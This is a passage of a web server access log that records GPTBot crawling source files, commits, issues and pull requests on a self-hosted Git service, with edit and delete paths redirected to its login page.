AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py?display=source" [Client 74.7.227.38] [Length 20120] [Gzip 6.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:18:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12407] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" +[17/Feb/2026:18:01:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9844] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:02:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10681] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10131] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10129] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13146] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:02:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:18:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" +[17/Feb/2026:18:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html?display=source" [Client 74.7.227.38] [Length 22731] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" +[17/Feb/2026:18:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10135] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13314] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11077] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13353] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13352] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?files=.TemporaryDocument%2f%ed%95%84%ec%9a%94%20Linux%eb%aa%85%eb%a0%b9%eb%93%a4%20%eb%aa%a8%ec%9d%8c.md" [Client 74.7.227.38] [Length 17078] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:02:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:18:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:18:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:18:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 